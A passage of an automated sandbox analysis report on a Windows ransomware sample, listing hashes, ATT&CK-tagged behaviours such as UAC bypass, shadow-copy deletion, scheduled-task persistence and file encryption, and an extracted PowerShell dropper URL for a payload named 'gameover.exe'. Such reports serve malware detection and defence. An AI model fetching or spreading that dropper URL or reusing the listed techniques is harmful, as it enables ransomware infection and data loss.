a84f1837031f236302dc335ea0d285e4c9e223631ae2702a0d6176a743018161

Analysis

max time kernel
132s
max time network
110s
platform
windows10_x64
resource
win10v20201028
submitted
27-02-2021 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BleachGap.bin.exe
Size

1001KB
MD5

015bb16ddcbf8a6326ec859020466c05
SHA1

f0ff1059e64175c8bf3f557cf1b0f49ed105d7d4
SHA256

c1eb88cc7f7b43de1ef71fae416c729483d71fa930314c36dfb03b01b8455d31
SHA512

588051f1702c69b96168c9bfa41bdb9aaffdf48bf3178e30ee1bf1510989a1b43b1032b9b002f81907428182a050befc9b00143b4991c47131bcb4b25dfc83c5

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

16 2492 powershell.exe
18 2492 powershell.exe
Disables Task Manager via registry modification
evasion

flow	pid	process
16	2492	powershell.exe
18	2492	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

DiscordSendWebhook.exeDiscordSendWebhook.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exe

pid	process
2488	DiscordSendWebhook.exe
2348	DiscordSendWebhook.exe
252	aescrypt.exe
1136	aescrypt.exe
3876	aescrypt.exe
1456	aescrypt.exe
2136	aescrypt.exe
2116	aescrypt.exe
3012	aescrypt.exe
2552	aescrypt.exe
3152	aescrypt.exe
3860	aescrypt.exe
2004	aescrypt.exe
3660	aescrypt.exe
3204	aescrypt.exe
2816	aescrypt.exe
2672	aescrypt.exe
3768	aescrypt.exe
1340	aescrypt.exe
8	aescrypt.exe
1372	aescrypt.exe
388	aescrypt.exe
3884	aescrypt.exe
2996	aescrypt.exe
2276	aescrypt.exe
1912	aescrypt.exe
2120	aescrypt.exe
2128	aescrypt.exe
1124	aescrypt.exe
3052	aescrypt.exe
2704	aescrypt.exe
2392	aescrypt.exe
584	aescrypt.exe
3820	aescrypt.exe
1832	aescrypt.exe
2504	aescrypt.exe
2240	aescrypt.exe
3492	aescrypt.exe
260	aescrypt.exe
1224	aescrypt.exe
500	aescrypt.exe
1512	aescrypt.exe
1932	aescrypt.exe
3108	aescrypt.exe
3080	aescrypt.exe
2132	aescrypt.exe
3548	aescrypt.exe
2540	aescrypt.exe
3380	aescrypt.exe
1980	aescrypt.exe
2264	aescrypt.exe
2008	aescrypt.exe
2232	aescrypt.exe
2192	aescrypt.exe
944	aescrypt.exe
1748	aescrypt.exe
3952	aescrypt.exe
816	aescrypt.exe
1896	aescrypt.exe
2260	aescrypt.exe
2324	aescrypt.exe
2912	aescrypt.exe
2820	aescrypt.exe
2500	aescrypt.exe

Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

aescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exeaescrypt.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\SendSearch.tif.lck.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\SendSearch.tif.lck.lck.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\SendSearch.tif.lck	aescrypt.exe
File opened for modification	C:\Users\Admin\Pictures\SendSearch.tif.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\SendSearch.tif.lck.lck	aescrypt.exe
File opened for modification	C:\Users\Admin\Pictures\SendSearch.tif.lck	aescrypt.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	cmd.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

File opened (read-only) \??\D: explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened (read-only)	\??\D:	explorer.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	explorer.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

252 schtasks.exe
640 schtasks.exe

pid	process
252	schtasks.exe
640	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SearchUI.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1128 vssadmin.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

388 taskkill.exe
3884 taskkill.exe
2272 taskkill.exe
2820 taskkill.exe

pid	process
1128	vssadmin.exe

pid	process
388	taskkill.exe
3884	taskkill.exe
2272	taskkill.exe
2820	taskkill.exe

Modifies registry class 31 IoCs

Processes:

SearchUI.exeexplorer.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002c100000000000002000000e50702004100720067006a006200650078000a005600610067007200650061007200670020006e007000700072006600660000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000009e1d2fea1e0dd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e50702004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000076bb2fea1e0dd70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e4070a004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000005aa40d5557add60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132483827320340134"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

5668 NOTEPAD.EXE

pid	process
5668	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 57 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaescrypt.exeaescrypt.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe
2492	powershell.exe
2492	powershell.exe
2492	powershell.exe
2272	powershell.exe
2272	powershell.exe
2272	powershell.exe
184	powershell.exe
184	powershell.exe
184	powershell.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
4100	powershell.exe
4100	powershell.exe
4100	powershell.exe
3456	aescrypt.exe
3456	aescrypt.exe
3456	aescrypt.exe
3916	aescrypt.exe
3916	aescrypt.exe
3916	aescrypt.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
5176	powershell.exe
5176	powershell.exe
5176	powershell.exe
5844	powershell.exe
5844	powershell.exe
5844	powershell.exe
5948	powershell.exe
5948	powershell.exe
5948	powershell.exe
6128	powershell.exe
6128	powershell.exe
6128	powershell.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe
6708	powershell.exe
6708	powershell.exe
6708	powershell.exe
6812	powershell.exe
6812	powershell.exe
6812	powershell.exe
6960	powershell.exe
6960	powershell.exe
6960	powershell.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

